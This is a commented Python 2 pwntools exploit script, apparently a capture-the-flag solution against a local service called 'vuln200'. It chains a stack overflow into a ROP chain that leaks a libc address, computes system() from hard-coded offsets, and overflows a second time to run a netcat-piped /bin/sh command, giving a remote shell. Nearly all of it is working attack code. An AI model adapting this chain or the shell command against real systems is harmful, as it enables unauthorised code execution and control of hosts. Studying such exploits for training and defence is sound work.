from pwn import *
# Python 2 pwntools script (print statements; str payloads concatenated with
# p32() output), so it does not run unmodified under Python 3.
# Flow as written below: one stack overflow drives a ROP chain that leaks a
# resolved libc pointer out of the GOT, a hard-coded libc offset turns that
# into system(), and a second overflow stages a command string and calls
# system() on it. Every binary-side address is an absolute 0x0804xxxx value,
# i.e. the target is assumed to load at a fixed base; only libc's base is
# recovered at runtime.
elf = ELF('/usr/local/src/pwn/vuln200/vuln200')
# PLT stubs are what the chain returns into; the GOT slots hold the resolved
# libc addresses and are what gets leaked.
recv_plt,send_plt = elf.plt['recv'], elf.plt['send']
recv_got,send_got = elf.got['recv'], elf.got['send']
# Gadget used to discard the four call arguments before the next return
# (four dwords follow every use below); presumably pop;pop;pop;pop;ret, by its name.
ppppr = 0x080493AC
# Address returned into after the leak so the program can be overflowed a
# second time (assumed to be the vulnerable routine, by its name).
vuln = 0x08048EEB
conn = remote("localhost", 7777)
# Writable scratch address the chain receives data into (name suggests .bss).
bss = 0x0804B0E0
# "write" + 236 + 4 bytes of filler reach the saved return address; the
# 240-byte offset is target-specific and not derivable from this file.
payload = "write"
payload += "A" * 236
payload += "AAAA"
# Chain step 1: send(4, send_got, 4, 0) -- writes the 4-byte GOT entry of send
# back over the socket (fd 4 presumably the client connection).
payload += p32(send_plt) # ret
payload += p32(ppppr) # argv1
payload += p32(4) # fd
payload += p32(send_got) # argv 2
payload += p32(4)
payload += p32(0)
# Chain step 2: recv(4, bss, 0x190, 0) -- reads up to 0x190 bytes from the
# socket into the scratch area.
payload += p32(recv_plt)
payload += p32(ppppr)
payload += p32(4)
payload += p32(bss)
payload += p32(0x190)
payload += p32(0)
# Chain step 3: return into vuln with a fake frame (dummy return address
# "AAAA", then three dwords that look like its arguments) so the overflow
# can be triggered again.
payload += p32(vuln)
payload += "AAAA"
payload += p32(bss)
payload += p32(4)
payload += p32(0x190)
conn.send(payload + "\n")
# Consume the program's banner up to the point where the leaked bytes begin.
print conn.recvuntil("Return to the main\n")
# The 4 bytes emitted by chain step 1: the runtime address of send in libc.
send_addr = u32(conn.recv(4))
# system - send distance inside the target's libc. These two offsets come
# from one specific libc build; any other build yields a wrong system_addr.
system_send = 0x00040310 - 0x000ED7F0
system_addr = send_addr + system_send
print "system_addr : " + hex(system_addr)
# Command string that the second chain stages into memory and passes to system().
cmd = "nc localhost 12348 | /bin/sh | nc localhost 12349"
# NOTE(review): differs from the bss value used by the first chain
# (0x080510E0 here vs 0x0804B0E0 above); the reason is not visible in this
# file -- confirm it is intentional.
bss = 0x080510E0
# Second overflow, same filler layout as the first.
payload2 = "write"
payload2 += "A" * 236
payload2 += "AAAA"
# recv(4, bss, len(cmd), 0): pull the command string into the scratch area.
payload2 += p32(recv_plt)
payload2 += p32(ppppr)
payload2 += p32(4)
payload2 += p32(bss)
payload2 += p32(len(cmd))
payload2 += p32(0)
# system(bss) with a dummy return address.
payload2 += p32(system_addr)
payload2 += "AAAA"
payload2 += p32(bss)
# Short pauses between sends, presumably so each one is consumed by a
# separate recv() on the target rather than coalesced.
sleep(0.3)
conn.send(payload2 + "\n")
sleep(0.3)
conn.send(cmd)
# Drain whatever the target writes back.
print conn.recv(1024)
print conn.recv(1024)
print conn.recv(1024)